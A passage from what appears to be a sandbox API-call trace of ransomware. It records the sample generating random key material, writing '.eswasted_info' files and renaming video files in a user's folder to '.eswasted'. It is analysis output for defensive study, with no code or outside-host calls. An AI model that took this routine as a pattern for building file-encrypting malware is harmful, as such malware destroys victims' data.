"c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\aa9zzaoysro\\ush_sld8akrb.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0080.766] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.768] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.769] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.769] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.769] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.770] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.770] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.812] SetEndOfFile (hFile=0x108) returned 1 [0080.814] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.814] CloseHandle (hObject=0x108) returned 1 [0080.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.819] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.820] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.820] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.820] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\dDbkiu27Nt.flv") returned 118 [0080.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f6) returned 0x1312110 [0080.820] lstrcpyW (in: lpString1=0x13121fc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.820] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.821] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.821] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.821] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\dDbkiu27Nt.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\ddbkiu27nt.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.822] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.823] SetEndOfFile (hFile=0x108) returned 1 [0080.823] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.823] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.823] lstrcpyW (in: lpString1=0x13121fc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.823] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\dDbkiu27Nt.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\ddbkiu27nt.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\dDbkiu27Nt.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\ddbkiu27nt.flv.eswasted")) returned 1 [0080.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\dDbkiu27Nt.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\ddbkiu27nt.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.825] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.828] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.829] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.829] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.829] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.830] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.830] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.838] SetEndOfFile (hFile=0x108) returned 1 [0080.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.841] CloseHandle (hObject=0x108) returned 1 [0080.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0080.843] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.843] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.843] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.844] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\IGB6Sal6x6Zu-w.flv") returned 122 [0080.844] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2fe) returned 0x1312110 [0080.844] lstrcpyW (in: lpString1=0x1312204, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.844] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1412050 [0080.844] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.844] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1412050 | out: pbBuffer=0x1412050) returned 1 [0080.844] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.845] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\IGB6Sal6x6Zu-w.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\igb6sal6x6zu-w.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.890] WriteFile (in: hFile=0x108, lpBuffer=0x1412050*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1412050*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.894] SetEndOfFile (hFile=0x108) returned 1 [0080.894] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.895] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1412050 | out: hHeap=0x6d0000) returned 1 [0080.895] lstrcpyW (in: lpString1=0x1312204, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.895] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\IGB6Sal6x6Zu-w.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\igb6sal6x6zu-w.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\IGB6Sal6x6Zu-w.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\igb6sal6x6zu-w.flv.eswasted")) returned 1 [0080.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\IGB6Sal6x6Zu-w.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\igb6sal6x6zu-w.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0080.896] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0080.899] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.900] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.900] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.900] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.901] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.901] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.910] SetEndOfFile (hFile=0x108) returned 1 [0080.912] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.912] CloseHandle (hObject=0x108) returned 1 [0080.915] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0080.915] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0080.916] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0080.916] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.916] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\oRrT2_TD.swf") returned 116 [0080.916] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f2) returned 0x1312110 [0080.916] lstrcpyW (in: lpString1=0x13121f8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0080.916] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x738d10 [0080.916] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0080.917] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x738d10 | out: pbBuffer=0x738d10) returned 1 [0080.917] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\oRrT2_TD.swf.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\orrt2_td.swf.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0080.918] WriteFile (in: hFile=0x108, lpBuffer=0x738d10*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x738d10*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0080.919] SetEndOfFile (hFile=0x108) returned 1 [0080.919] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.919] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0080.919] lstrcpyW (in: lpString1=0x13121f8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0080.919] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\oRrT2_TD.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\orrt2_td.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\oRrT2_TD.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\orrt2_td.swf.eswasted")) returned 1 [0080.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\FS896neRzol\\oRrT2_TD.swf.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\fs896nerzol\\orrt2_td.swf.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0080.920] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0080.922] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0080.923] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0080.923] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.923] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0080.924] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0080.924] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0080.965] SetEndOfFile (hFile=0x108) returned 1 [0081.062] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x738d10 | out: hHeap=0x6d0000) returned 1 [0081.062] CloseHandle (hObject=0x108) returned 1 [0081.064] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0081.064] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.065] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.065] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.065] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\L14QnkKkvVL.mp4") returned 107 [0081.065] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2e0) returned 0x1312110 [0081.065] lstrcpyW (in: lpString1=0x13121e6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.065] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0081.065] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.066] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0081.066] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\L14QnkKkvVL.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\l14qnkkkvvl.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.067] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.068] SetEndOfFile (hFile=0x108) returned 1 [0081.068] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.068] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.068] lstrcpyW (in: lpString1=0x13121e6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.068] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\L14QnkKkvVL.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\l14qnkkkvvl.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\L14QnkKkvVL.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\l14qnkkkvvl.mp4.eswasted")) returned 1 [0081.069] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\L14QnkKkvVL.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\l14qnkkkvvl.mp4.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0081.069] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0081.070] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0081.071] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0081.071] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.071] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0081.072] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0081.072] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.080] SetEndOfFile (hFile=0x108) returned 1 [0081.082] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.082] CloseHandle (hObject=0x108) returned 1 [0081.084] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1312110 | out: hHeap=0x6d0000) returned 1 [0081.084] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0081.085] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0081.085] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.085] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\OZO5d7F9WWfZWgkgRi8h.mp4") returned 116 [0081.085] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f2) returned 0x1312110 [0081.085] lstrcpyW (in: lpString1=0x13121f8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.085] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x1410048 [0081.085] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0081.086] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x1410048 | out: pbBuffer=0x1410048) returned 1 [0081.086] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0081.086] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\OZO5d7F9WWfZWgkgRi8h.mp4.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\ozo5d7f9wwfzwgkgri8h.mp4.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0081.086] WriteFile (in: hFile=0x108, lpBuffer=0x1410048*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x1410048*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.087] SetEndOfFile (hFile=0x108) returned 1 [0081.088] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.088] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x1410048 | out: hHeap=0x6d0000) returned 1 [0081.088] lstrcpyW (in: lpString1=0x13121f8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\OZO5d7F9WWfZWgkgRi8h.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\ozo5d7f9wwfzwgkgri8h.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ Xg_G\\1kMbg\\c8fjIb0QJshu\\OZO5d7F9WWfZWgkgRi8h.mp4.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hgsgs4 trn aazkud3k4\\txlpj xg_g\\1kmbg\\c8fjib0qjshu\\ozo5d7f9wwfzwgkgri8h.mp4.eswasted")) returned 1 [0081.088] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\HgSgS4 trn AaZKud3K4\\tXLpJ 